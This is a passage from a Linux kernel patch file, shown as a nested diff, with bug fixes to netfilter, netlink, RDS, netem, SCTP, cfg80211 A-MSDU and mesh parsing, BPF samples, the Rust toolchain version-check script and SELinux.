++	if (!refcount_dec_not_one(&ct->ct_general.use))
++		return false;
++
++	skb_set_nfct(entry->skb, 0);
++	/* No nf_ct_put(): we already decremented .use and it cannot
++	 * drop down to 0.
++	 */
++	return true;
+ #endif
+ 	return false;
+ }
+diff --git a/net/netfilter/nft_counter.c b/net/netfilter/nft_counter.c
+index b5fe7fe4b60db..781d3a26f5df7 100644
+--- a/net/netfilter/nft_counter.c
++++ b/net/netfilter/nft_counter.c
+@@ -107,11 +107,16 @@ static void nft_counter_reset(struct nft_counter_percpu_priv *priv,
+ 			      struct nft_counter *total)
+ {
+ 	struct nft_counter *this_cpu;
++	seqcount_t *myseq;
+ 
+ 	local_bh_disable();
+ 	this_cpu = this_cpu_ptr(priv->counter);
++	myseq = this_cpu_ptr(&nft_counter_seq);
++
++	write_seqcount_begin(myseq);
+ 	this_cpu->packets -= total->packets;
+ 	this_cpu->bytes -= total->bytes;
++	write_seqcount_end(myseq);
+ 	local_bh_enable();
+ }
+ 
+@@ -264,7 +269,7 @@ static void nft_counter_offload_stats(struct nft_expr *expr,
+ 	struct nft_counter *this_cpu;
+ 	seqcount_t *myseq;
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	this_cpu = this_cpu_ptr(priv->counter);
+ 	myseq = this_cpu_ptr(&nft_counter_seq);
+ 
+@@ -272,7 +277,7 @@ static void nft_counter_offload_stats(struct nft_expr *expr,
+ 	this_cpu->packets += stats->pkts;
+ 	this_cpu->bytes += stats->bytes;
+ 	write_seqcount_end(myseq);
+-	preempt_enable();
++	local_bh_enable();
+ }
+ 
+ void nft_counter_init_seqcount(void)
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index e9b81cba1e2b4..8d26bd2ae3d55 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -130,7 +130,7 @@ static const char *const nlk_cb_mutex_key_strings[MAX_LINKS + 1] = {
+ 	"nlk_cb_mutex-MAX_LINKS"
+ };
+ 
+-static int netlink_dump(struct sock *sk);
++static int netlink_dump(struct sock *sk, bool lock_taken);
+ 
+ /* nl_table locking explained:
+  * Lookup and traversal are protected with an RCU read-side lock. Insertion
+@@ -1953,7 +1953,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	if (READ_ONCE(nlk->cb_running) &&
+ 	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf / 2) {
+-		ret = netlink_dump(sk);
++		ret = netlink_dump(sk, false);
+ 		if (ret) {
+ 			WRITE_ONCE(sk->sk_err, -ret);
+ 			sk_error_report(sk);
+@@ -2163,7 +2163,7 @@ static int netlink_dump_done(struct netlink_sock *nlk, struct sk_buff *skb,
+ 	return 0;
+ }
+ 
+-static int netlink_dump(struct sock *sk)
++static int netlink_dump(struct sock *sk, bool lock_taken)
+ {
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+ 	struct netlink_ext_ack extack = {};
+@@ -2175,7 +2175,8 @@ static int netlink_dump(struct sock *sk)
+ 	int alloc_min_size;
+ 	int alloc_size;
+ 
+-	mutex_lock(nlk->cb_mutex);
++	if (!lock_taken)
++		mutex_lock(nlk->cb_mutex);
+ 	if (!nlk->cb_running) {
+ 		err = -EINVAL;
+ 		goto errout_skb;
+@@ -2330,9 +2331,7 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 	WRITE_ONCE(nlk->cb_running, true);
+ 	nlk->dump_done_errno = INT_MAX;
+ 
+-	mutex_unlock(nlk->cb_mutex);
+-
+-	ret = netlink_dump(sk);
++	ret = netlink_dump(sk, true);
+ 
+ 	sock_put(sk);
+ 
+diff --git a/net/rds/recv.c b/net/rds/recv.c
+index 5b426dc3634d1..a316180d3c32e 100644
+--- a/net/rds/recv.c
++++ b/net/rds/recv.c
+@@ -424,6 +424,7 @@ static int rds_still_queued(struct rds_sock *rs, struct rds_incoming *inc,
+ 	struct sock *sk = rds_rs_to_sk(rs);
+ 	int ret = 0;
+ 	unsigned long flags;
++	struct rds_incoming *to_drop = NULL;
+ 
+ 	write_lock_irqsave(&rs->rs_recv_lock, flags);
+ 	if (!list_empty(&inc->i_item)) {
+@@ -434,11 +435,14 @@ static int rds_still_queued(struct rds_sock *rs, struct rds_incoming *inc,
+ 					      -be32_to_cpu(inc->i_hdr.h_len),
+ 					      inc->i_hdr.h_dport);
+ 			list_del_init(&inc->i_item);
+-			rds_inc_put(inc);
++			to_drop = inc;
+ 		}
+ 	}
+ 	write_unlock_irqrestore(&rs->rs_recv_lock, flags);
+ 
++	if (to_drop)
++		rds_inc_put(to_drop);
++
+ 	rdsdebug("inc %p rs %p still %d dropped %d\n", inc, rs, ret, drop);
+ 	return ret;
+ }
+@@ -757,16 +761,21 @@ void rds_clear_recv_queue(struct rds_sock *rs)
+ 	struct sock *sk = rds_rs_to_sk(rs);
+ 	struct rds_incoming *inc, *tmp;
+ 	unsigned long flags;
++	LIST_HEAD(to_drop);
+ 
+ 	write_lock_irqsave(&rs->rs_recv_lock, flags);
+ 	list_for_each_entry_safe(inc, tmp, &rs->rs_recv_queue, i_item) {
+ 		rds_recv_rcvbuf_delta(rs, sk, inc->i_conn->c_lcong,
+ 				      -be32_to_cpu(inc->i_hdr.h_len),
+ 				      inc->i_hdr.h_dport);
++		list_move(&inc->i_item, &to_drop);
++	}
++	write_unlock_irqrestore(&rs->rs_recv_lock, flags);
++
++	list_for_each_entry_safe(inc, tmp, &to_drop, i_item) {
+ 		list_del_init(&inc->i_item);
+ 		rds_inc_put(inc);
+ 	}
+-	write_unlock_irqrestore(&rs->rs_recv_lock, flags);
+ }
+ 
+ /*
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index 7053c0292c335..6ab9359c1706f 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -502,7 +502,7 @@ static void dev_watchdog(struct timer_list *t)
+ 		if (netif_device_present(dev) &&
+ 		    netif_running(dev) &&
+ 		    netif_carrier_ok(dev)) {
+-			int some_queue_timedout = 0;
++			unsigned int timedout_ms = 0;
+ 			unsigned int i;
+ 			unsigned long trans_start;
+ 
+@@ -514,16 +514,17 @@ static void dev_watchdog(struct timer_list *t)
+ 				if (netif_xmit_stopped(txq) &&
+ 				    time_after(jiffies, (trans_start +
+ 							 dev->watchdog_timeo))) {
+-					some_queue_timedout = 1;
++					timedout_ms = jiffies_to_msecs(jiffies - trans_start);
+ 					atomic_long_inc(&txq->trans_timeout);
+ 					break;
+ 				}
+ 			}
+ 
+-			if (unlikely(some_queue_timedout)) {
++			if (unlikely(timedout_ms)) {
+ 				trace_net_dev_xmit_timeout(dev, i);
+-				WARN_ONCE(1, KERN_INFO "NETDEV WATCHDOG: %s (%s): transmit queue %u timed out\n",
+-				       dev->name, netdev_drivername(dev), i);
++				netdev_crit(dev, "NETDEV WATCHDOG: CPU: %d: transmit queue %u timed out %u ms\n",
++					    raw_smp_processor_id(),
++					    i, timedout_ms);
+ 				netif_freeze_queues(dev);
+ 				dev->netdev_ops->ndo_tx_timeout(dev, i);
+ 				netif_unfreeze_queues(dev);
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index d0e045116d4e9..a18b24c125f4e 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -437,12 +437,10 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 	struct netem_sched_data *q = qdisc_priv(sch);
+ 	/* We don't fill cb now as skb_unshare() may invalidate it */
+ 	struct netem_skb_cb *cb;
+-	struct sk_buff *skb2;
++	struct sk_buff *skb2 = NULL;
+ 	struct sk_buff *segs = NULL;
+ 	unsigned int prev_len = qdisc_pkt_len(skb);
+ 	int count = 1;
+-	int rc = NET_XMIT_SUCCESS;
+-	int rc_drop = NET_XMIT_DROP;
+ 
+ 	/* Do not fool qdisc_drop_all() */
+ 	skb->prev = NULL;
+@@ -471,19 +469,11 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 		skb_orphan_partial(skb);
+ 
+ 	/*
+-	 * If we need to duplicate packet, then re-insert at top of the
+-	 * qdisc tree, since parent queuer expects that only one
+-	 * skb will be queued.
++	 * If we need to duplicate packet, then clone it before
++	 * original is modified.
+ 	 */
+-	if (count > 1 && (skb2 = skb_clone(skb, GFP_ATOMIC)) != NULL) {
+-		struct Qdisc *rootq = qdisc_root_bh(sch);
+-		u32 dupsave = q->duplicate; /* prevent duplicating a dup... */
+-
+-		q->duplicate = 0;
+-		rootq->enqueue(skb2, rootq, to_free);
+-		q->duplicate = dupsave;
+-		rc_drop = NET_XMIT_SUCCESS;
+-	}
++	if (count > 1)
++		skb2 = skb_clone(skb, GFP_ATOMIC);
+ 
+ 	/*
+ 	 * Randomized packet corruption.
+@@ -495,7 +485,8 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 		if (skb_is_gso(skb)) {
+ 			skb = netem_segment(skb, sch, to_free);
+ 			if (!skb)
+-				return rc_drop;
++				goto finish_segs;
++
+ 			segs = skb->next;
+ 			skb_mark_not_on_list(skb);
+ 			qdisc_skb_cb(skb)->pkt_len = skb->len;
+@@ -521,7 +512,24 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 		/* re-link segs, so that qdisc_drop_all() frees them all */
+ 		skb->next = segs;
+ 		qdisc_drop_all(skb, sch, to_free);
+-		return rc_drop;
++		if (skb2)
++			__qdisc_drop(skb2, to_free);
++		return NET_XMIT_DROP;
++	}
++
++	/*
++	 * If doing duplication then re-insert at top of the
++	 * qdisc tree, since parent queuer expects that only one
++	 * skb will be queued.
++	 */
++	if (skb2) {
++		struct Qdisc *rootq = qdisc_root_bh(sch);
++		u32 dupsave = q->duplicate; /* prevent duplicating a dup... */
++
++		q->duplicate = 0;
++		rootq->enqueue(skb2, rootq, to_free);
++		q->duplicate = dupsave;
++		skb2 = NULL;
+ 	}
+ 
+ 	qdisc_qstats_backlog_inc(sch, skb);
+@@ -592,9 +600,12 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 	}
+ 
+ finish_segs:
++	if (skb2)
++		__qdisc_drop(skb2, to_free);
++
+ 	if (segs) {
+ 		unsigned int len, last_len;
+-		int nb;
++		int rc, nb;
+ 
+ 		len = skb ? skb->len : 0;
+ 		nb = skb ? 1 : 0;
+diff --git a/net/sctp/inqueue.c b/net/sctp/inqueue.c
+index 7182c5a450fb5..5c16521818058 100644
+--- a/net/sctp/inqueue.c
++++ b/net/sctp/inqueue.c
+@@ -38,6 +38,14 @@ void sctp_inq_init(struct sctp_inq *queue)
+ 	INIT_WORK(&queue->immediate, NULL);
+ }
+ 
++/* Properly release the chunk which is being worked on. */
++static inline void sctp_inq_chunk_free(struct sctp_chunk *chunk)
++{
++	if (chunk->head_skb)
++		chunk->skb = chunk->head_skb;
++	sctp_chunk_free(chunk);
++}
++
+ /* Release the memory associated with an SCTP inqueue.  */
+ void sctp_inq_free(struct sctp_inq *queue)
+ {
+@@ -53,7 +61,7 @@ void sctp_inq_free(struct sctp_inq *queue)
+ 	 * free it as well.
+ 	 */
+ 	if (queue->in_progress) {
+-		sctp_chunk_free(queue->in_progress);
++		sctp_inq_chunk_free(queue->in_progress);
+ 		queue->in_progress = NULL;
+ 	}
+ }
+@@ -130,9 +138,7 @@ struct sctp_chunk *sctp_inq_pop(struct sctp_inq *queue)
+ 				goto new_skb;
+ 			}
+ 
+-			if (chunk->head_skb)
+-				chunk->skb = chunk->head_skb;
+-			sctp_chunk_free(chunk);
++			sctp_inq_chunk_free(chunk);
+ 			chunk = queue->in_progress = NULL;
+ 		} else {
+ 			/* Nothing to do. Next chunk in the packet, please. */
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index ee980965a7cfb..8118b8614ac68 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -228,6 +228,7 @@ void cfg80211_register_wdev(struct cfg80211_registered_device *rdev,
+ static inline void wdev_lock(struct wireless_dev *wdev)
+ 	__acquires(wdev)
+ {
++	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	mutex_lock(&wdev->mtx);
+ 	__acquire(wdev->mtx);
+ }
+@@ -235,11 +236,16 @@ static inline void wdev_lock(struct wireless_dev *wdev)
+ static inline void wdev_unlock(struct wireless_dev *wdev)
+ 	__releases(wdev)
+ {
++	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	__release(wdev->mtx);
+ 	mutex_unlock(&wdev->mtx);
+ }
+ 
+-#define ASSERT_WDEV_LOCK(wdev) lockdep_assert_held(&(wdev)->mtx)
++static inline void ASSERT_WDEV_LOCK(struct wireless_dev *wdev)
++{
++	lockdep_assert_held(&wdev->wiphy->mtx);
++	lockdep_assert_held(&wdev->mtx);
++}
+ 
+ static inline bool cfg80211_has_monitors_only(struct cfg80211_registered_device *rdev)
+ {
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index 1665320d22146..c71b85fd6052d 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -542,6 +542,66 @@ unsigned int ieee80211_get_mesh_hdrlen(struct ieee80211s_hdr *meshhdr)
+ }
+ EXPORT_SYMBOL(ieee80211_get_mesh_hdrlen);
+ 
++bool ieee80211_get_8023_tunnel_proto(const void *hdr, __be16 *proto)
++{
++	const __be16 *hdr_proto = hdr + ETH_ALEN;
++
++	if (!(ether_addr_equal(hdr, rfc1042_header) &&
++	      *hdr_proto != htons(ETH_P_AARP) &&
++	      *hdr_proto != htons(ETH_P_IPX)) &&
++	    !ether_addr_equal(hdr, bridge_tunnel_header))
++		return false;
++
++	*proto = *hdr_proto;
++
++	return true;
++}
++EXPORT_SYMBOL(ieee80211_get_8023_tunnel_proto);
++
++int ieee80211_strip_8023_mesh_hdr(struct sk_buff *skb)
++{
++	const void *mesh_addr;
++	struct {
++		struct ethhdr eth;
++		u8 flags;
++	} payload;
++	int hdrlen;
++	int ret;
++
++	ret = skb_copy_bits(skb, 0, &payload, sizeof(payload));
++	if (ret)
++		return ret;
++
++	hdrlen = sizeof(payload.eth) + __ieee80211_get_mesh_hdrlen(payload.flags);
++
++	if (likely(pskb_may_pull(skb, hdrlen + 8) &&
++		   ieee80211_get_8023_tunnel_proto(skb->data + hdrlen,
++						   &payload.eth.h_proto)))
++		hdrlen += ETH_ALEN + 2;
++	else if (!pskb_may_pull(skb, hdrlen))
++		return -EINVAL;
++	else
++		payload.eth.h_proto = htons(skb->len - hdrlen);
++
++	mesh_addr = skb->data + sizeof(payload.eth) + ETH_ALEN;
++	switch (payload.flags & MESH_FLAGS_AE) {
++	case MESH_FLAGS_AE_A4:
++		memcpy(&payload.eth.h_source, mesh_addr, ETH_ALEN);
++		break;
++	case MESH_FLAGS_AE_A5_A6:
++		memcpy(&payload.eth, mesh_addr, 2 * ETH_ALEN);
++		break;
++	default:
++		break;
++	}
++
++	pskb_pull(skb, hdrlen - sizeof(payload.eth));
++	memcpy(skb->data, &payload.eth, sizeof(payload.eth));
++
++	return 0;
++}
++EXPORT_SYMBOL(ieee80211_strip_8023_mesh_hdr);
++
+ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 				  const u8 *addr, enum nl80211_iftype iftype,
+ 				  u8 data_offset, bool is_amsdu)
+@@ -553,7 +613,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 	} payload;
+ 	struct ethhdr tmp;
+ 	u16 hdrlen;
+-	u8 mesh_flags = 0;
+ 
+ 	if (unlikely(!ieee80211_is_data_present(hdr->frame_control)))
+ 		return -1;
+@@ -574,12 +633,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 	memcpy(tmp.h_dest, ieee80211_get_DA(hdr), ETH_ALEN);
+ 	memcpy(tmp.h_source, ieee80211_get_SA(hdr), ETH_ALEN);
+ 
+-	if (iftype == NL80211_IFTYPE_MESH_POINT &&
+-	    skb_copy_bits(skb, hdrlen, &mesh_flags, 1) < 0)
+-		return -1;
+-
+-	mesh_flags &= MESH_FLAGS_AE;
+-
+ 	switch (hdr->frame_control &
+ 		cpu_to_le16(IEEE80211_FCTL_TODS | IEEE80211_FCTL_FROMDS)) {
+ 	case cpu_to_le16(IEEE80211_FCTL_TODS):
+@@ -593,17 +646,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 			     iftype != NL80211_IFTYPE_AP_VLAN &&
+ 			     iftype != NL80211_IFTYPE_STATION))
+ 			return -1;
+-		if (iftype == NL80211_IFTYPE_MESH_POINT) {
+-			if (mesh_flags == MESH_FLAGS_AE_A4)
+-				return -1;
+-			if (mesh_flags == MESH_FLAGS_AE_A5_A6 &&
+-			    skb_copy_bits(skb, hdrlen +
+-					  offsetof(struct ieee80211s_hdr, eaddr1),
+-					  tmp.h_dest, 2 * ETH_ALEN) < 0)
+-				return -1;
+-
+-			hdrlen += __ieee80211_get_mesh_hdrlen(mesh_flags);
+-		}
+ 		break;
+ 	case cpu_to_le16(IEEE80211_FCTL_FROMDS):
+ 		if ((iftype != NL80211_IFTYPE_STATION &&
+@@ -612,16 +654,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 		    (is_multicast_ether_addr(tmp.h_dest) &&
+ 		     ether_addr_equal(tmp.h_source, addr)))
+ 			return -1;
+-		if (iftype == NL80211_IFTYPE_MESH_POINT) {
+-			if (mesh_flags == MESH_FLAGS_AE_A5_A6)
+-				return -1;
+-			if (mesh_flags == MESH_FLAGS_AE_A4 &&
+-			    skb_copy_bits(skb, hdrlen +
+-					  offsetof(struct ieee80211s_hdr, eaddr1),
+-					  tmp.h_source, ETH_ALEN) < 0)
+-				return -1;
+-			hdrlen += __ieee80211_get_mesh_hdrlen(mesh_flags);
+-		}
+ 		break;
+ 	case cpu_to_le16(0):
+ 		if (iftype != NL80211_IFTYPE_ADHOC &&
+@@ -631,15 +663,11 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 		break;
+ 	}
+ 
+-	if (likely(skb_copy_bits(skb, hdrlen, &payload, sizeof(payload)) == 0 &&
+-	           ((!is_amsdu && ether_addr_equal(payload.hdr, rfc1042_header) &&
+-		     payload.proto != htons(ETH_P_AARP) &&
+-		     payload.proto != htons(ETH_P_IPX)) ||
+-		    ether_addr_equal(payload.hdr, bridge_tunnel_header)))) {
+-		/* remove RFC1042 or Bridge-Tunnel encapsulation and
+-		 * replace EtherType */
++	if (likely(!is_amsdu && iftype != NL80211_IFTYPE_MESH_POINT &&
++		   skb_copy_bits(skb, hdrlen, &payload, sizeof(payload)) == 0 &&
++		   ieee80211_get_8023_tunnel_proto(&payload, &tmp.h_proto))) {
++		/* remove RFC1042 or Bridge-Tunnel encapsulation */
+ 		hdrlen += ETH_ALEN + 2;
+-		tmp.h_proto = payload.proto;
+ 		skb_postpull_rcsum(skb, &payload, ETH_ALEN + 2);
+ 	} else {
+ 		tmp.h_proto = htons(skb->len - hdrlen);
+@@ -711,7 +739,8 @@ __ieee80211_amsdu_copy_frag(struct sk_buff *skb, struct sk_buff *frame,
+ 
+ static struct sk_buff *
+ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+-		       int offset, int len, bool reuse_frag)
++		       int offset, int len, bool reuse_frag,
++		       int min_len)
+ {
+ 	struct sk_buff *frame;
+ 	int cur_len = len;
+@@ -725,7 +754,7 @@ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+ 	 * in the stack later.
+ 	 */
+ 	if (reuse_frag)
+-		cur_len = min_t(int, len, 32);
++		cur_len = min_t(int, len, min_len);
+ 
+ 	/*
+ 	 * Allocate and reserve two bytes more for payload
+@@ -735,6 +764,7 @@ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+ 	if (!frame)
+ 		return NULL;
+ 
++	frame->priority = skb->priority;
+ 	skb_reserve(frame, hlen + sizeof(struct ethhdr) + 2);
+ 	skb_copy_bits(skb, offset, skb_put(frame, cur_len), cur_len);
+ 
+@@ -748,46 +778,96 @@ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+ 	return frame;
+ }
+ 
++bool ieee80211_is_valid_amsdu(struct sk_buff *skb, bool mesh_hdr)
++{
++	int offset = 0, subframe_len, padding;
++
++	for (offset = 0; offset < skb->len; offset += subframe_len + padding) {
++		int remaining = skb->len - offset;
++		struct {
++		    __be16 len;
++		    u8 mesh_flags;
++		} hdr;
++		u16 len;
++
++		if (sizeof(hdr) > remaining)
++			return false;
++
++		if (skb_copy_bits(skb, offset + 2 * ETH_ALEN, &hdr, sizeof(hdr)) < 0)
++			return false;
++
++		if (mesh_hdr)
++			len = le16_to_cpu(*(__le16 *)&hdr.len) +
++			      __ieee80211_get_mesh_hdrlen(hdr.mesh_flags);
++		else
++			len = ntohs(hdr.len);
++
++		subframe_len = sizeof(struct ethhdr) + len;
++		padding = (4 - subframe_len) & 0x3;
++
++		if (subframe_len > remaining)
++			return false;
++	}
++
++	return true;
++}
++EXPORT_SYMBOL(ieee80211_is_valid_amsdu);
++
+ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 			      const u8 *addr, enum nl80211_iftype iftype,
+ 			      const unsigned int extra_headroom,
+-			      const u8 *check_da, const u8 *check_sa)
++			      const u8 *check_da, const u8 *check_sa,
++			      bool mesh_control)
+ {
+ 	unsigned int hlen = ALIGN(extra_headroom, 4);
+ 	struct sk_buff *frame = NULL;
+-	u16 ethertype;
+-	u8 *payload;
+-	int offset = 0, remaining;
+-	struct ethhdr eth;
++	int offset = 0;
++	struct {
++		struct ethhdr eth;
++		uint8_t flags;
++	} hdr;
+ 	bool reuse_frag = skb->head_frag && !skb_has_frag_list(skb);
+ 	bool reuse_skb = false;
+ 	bool last = false;
++	int copy_len = sizeof(hdr.eth);
++
++	if (iftype == NL80211_IFTYPE_MESH_POINT)
++		copy_len = sizeof(hdr);
+ 
+ 	while (!last) {
++		int remaining = skb->len - offset;
+ 		unsigned int subframe_len;
+-		int len;
++		int len, mesh_len = 0;
+ 		u8 padding;
+ 
+-		skb_copy_bits(skb, offset, &eth, sizeof(eth));
+-		len = ntohs(eth.h_proto);
++		if (copy_len > remaining)
++			goto purge;
++
++		skb_copy_bits(skb, offset, &hdr, copy_len);
++		if (iftype == NL80211_IFTYPE_MESH_POINT)
++			mesh_len = __ieee80211_get_mesh_hdrlen(hdr.flags);
++		if (mesh_control)
++			len = le16_to_cpu(*(__le16 *)&hdr.eth.h_proto) + mesh_len;
++		else
++			len = ntohs(hdr.eth.h_proto);
++
+ 		subframe_len = sizeof(struct ethhdr) + len;
+ 		padding = (4 - subframe_len) & 0x3;
+ 
+ 		/* the last MSDU has no padding */
+-		remaining = skb->len - offset;
+ 		if (subframe_len > remaining)
+ 			goto purge;
+ 		/* mitigate A-MSDU aggregation injection attacks */
+-		if (ether_addr_equal(eth.h_dest, rfc1042_header))
++		if (ether_addr_equal(hdr.eth.h_dest, rfc1042_header))
+ 			goto purge;
+ 
+ 		offset += sizeof(struct ethhdr);
+ 		last = remaining <= subframe_len + padding;
+ 
+ 		/* FIXME: should we really accept multicast DA? */
+-		if ((check_da && !is_multicast_ether_addr(eth.h_dest) &&
+-		     !ether_addr_equal(check_da, eth.h_dest)) ||
+-		    (check_sa && !ether_addr_equal(check_sa, eth.h_source))) {
++		if ((check_da && !is_multicast_ether_addr(hdr.eth.h_dest) &&
++		     !ether_addr_equal(check_da, hdr.eth.h_dest)) ||
++		    (check_sa && !ether_addr_equal(check_sa, hdr.eth.h_source))) {
+ 			offset += len + padding;
+ 			continue;
+ 		}
+@@ -799,7 +879,7 @@ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 			reuse_skb = true;
+ 		} else {
+ 			frame = __ieee80211_amsdu_copy(skb, hlen, offset, len,
+-						       reuse_frag);
++						       reuse_frag, 32 + mesh_len);
+ 			if (!frame)
+ 				goto purge;
+ 
+@@ -810,16 +890,11 @@ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 		frame->dev = skb->dev;
+ 		frame->priority = skb->priority;
+ 
+-		payload = frame->data;
+-		ethertype = (payload[6] << 8) | payload[7];
+-		if (likely((ether_addr_equal(payload, rfc1042_header) &&
+-			    ethertype != ETH_P_AARP && ethertype != ETH_P_IPX) ||
+-			   ether_addr_equal(payload, bridge_tunnel_header))) {
+-			eth.h_proto = htons(ethertype);
++		if (likely(iftype != NL80211_IFTYPE_MESH_POINT &&
++			   ieee80211_get_8023_tunnel_proto(frame->data, &hdr.eth.h_proto)))
+ 			skb_pull(frame, ETH_ALEN + 2);
+-		}
+ 
+-		memcpy(skb_push(frame, sizeof(eth)), &eth, sizeof(eth));
++		memcpy(skb_push(frame, sizeof(hdr.eth)), &hdr.eth, sizeof(hdr.eth));
+ 		__skb_queue_tail(list, frame);
+ 	}
+ 
+diff --git a/samples/bpf/map_perf_test_user.c b/samples/bpf/map_perf_test_user.c
+index 1bb53f4b29e11..cb5c776103b99 100644
+--- a/samples/bpf/map_perf_test_user.c
++++ b/samples/bpf/map_perf_test_user.c
+@@ -370,7 +370,7 @@ static void run_perf_test(int tasks)
+ 
+ static void fill_lpm_trie(void)
+ {
+-	struct bpf_lpm_trie_key *key;
++	struct bpf_lpm_trie_key_u8 *key;
+ 	unsigned long value = 0;
+ 	unsigned int i;
+ 	int r;
+diff --git a/samples/bpf/xdp_router_ipv4_user.c b/samples/bpf/xdp_router_ipv4_user.c
+index 683913bbf2797..28bae295d0ed1 100644
+--- a/samples/bpf/xdp_router_ipv4_user.c
++++ b/samples/bpf/xdp_router_ipv4_user.c
+@@ -91,7 +91,7 @@ static int recv_msg(struct sockaddr_nl sock_addr, int sock)
+ static void read_route(struct nlmsghdr *nh, int nll)
+ {
+ 	char dsts[24], gws[24], ifs[16], dsts_len[24], metrics[24];
+-	struct bpf_lpm_trie_key *prefix_key;
++	struct bpf_lpm_trie_key_u8 *prefix_key;
+ 	struct rtattr *rt_attr;
+ 	struct rtmsg *rt_msg;
+ 	int rtm_family;
+diff --git a/scripts/rust_is_available.sh b/scripts/rust_is_available.sh
+index 7a925d2b20fc7..141644c164636 100755
+--- a/scripts/rust_is_available.sh
++++ b/scripts/rust_is_available.sh
+@@ -38,10 +38,21 @@ fi
+ # Check that the Rust compiler version is suitable.
+ #
+ # Non-stable and distributions' versions may have a version suffix, e.g. `-dev`.
++rust_compiler_output=$( \
++	LC_ALL=C "$RUSTC" --version 2>/dev/null
++) || rust_compiler_code=$?
++if [ -n "$rust_compiler_code" ]; then
++	echo >&2 "***"
++	echo >&2 "*** Running '$RUSTC' to check the Rust compiler version failed with"
++	echo >&2 "*** code $rust_compiler_code. See output and docs below for details:"
++	echo >&2 "***"
++	echo >&2 "$rust_compiler_output"
++	echo >&2 "***"
++	exit 1
++fi
+ rust_compiler_version=$( \
+-	LC_ALL=C "$RUSTC" --version 2>/dev/null \
+-		| head -n 1 \
+-		| grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \
++	echo "$rust_compiler_output" \
++		| sed -nE '1s:.*rustc ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+ )
+ rust_compiler_min_version=$($min_tool_version rustc)
+ rust_compiler_cversion=$(get_canonical_version $rust_compiler_version)
+@@ -65,10 +76,25 @@ fi
+ # Check that the Rust bindings generator is suitable.
+ #
+ # Non-stable and distributions' versions may have a version suffix, e.g. `-dev`.
++#
++# The dummy parameter `workaround-for-0.69.0` is required to support 0.69.0
++# (https://github.com/rust-lang/rust-bindgen/pull/2678). It can be removed when
++# the minimum version is upgraded past that (0.69.1 already fixed the issue).
++rust_bindings_generator_output=$( \
++	LC_ALL=C "$BINDGEN" --version workaround-for-0.69.0 2>/dev/null
++) || rust_bindings_generator_code=$?
++if [ -n "$rust_bindings_generator_code" ]; then
++	echo >&2 "***"
++	echo >&2 "*** Running '$BINDGEN' to check the Rust bindings generator version failed with"
++	echo >&2 "*** code $rust_bindings_generator_code. See output and docs below for details:"
++	echo >&2 "***"
++	echo >&2 "$rust_bindings_generator_output"
++	echo >&2 "***"
++	exit 1
++fi
+ rust_bindings_generator_version=$( \
+-	LC_ALL=C "$BINDGEN" --version 2>/dev/null \
+-		| head -n 1 \
+-		| grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \
++	echo "$rust_bindings_generator_output" \
++		| sed -nE '1s:.*bindgen ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+ )
+ rust_bindings_generator_min_version=$($min_tool_version bindgen)
+ rust_bindings_generator_cversion=$(get_canonical_version $rust_bindings_generator_version)
+@@ -110,6 +136,9 @@ fi
+ 
+ # `bindgen` returned successfully, thus use the output to check that the version
+ # of the `libclang` found by the Rust bindings generator is suitable.
++#
++# Unlike other version checks, note that this one does not necessarily appear
++# in the first line of the output, thus no `sed` address is provided.
+ bindgen_libclang_version=$( \
+ 	echo "$bindgen_libclang_output" \
+ 		| sed -nE 's:.*clang version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+diff --git a/security/selinux/avc.c b/security/selinux/avc.c
+index 9a43af0ebd7de..8984ba92676db 100644
+--- a/security/selinux/avc.c
++++ b/security/selinux/avc.c
+@@ -332,12 +332,12 @@ static int avc_add_xperms_decision(struct avc_node *node,
+ {
+ 	struct avc_xperms_decision_node *dest_xpd;
+ 
+-	node->ae.xp_node->xp.len++;
+ 	dest_xpd = avc_xperms_decision_alloc(src->used);
+ 	if (!dest_xpd)
+ 		return -ENOMEM;
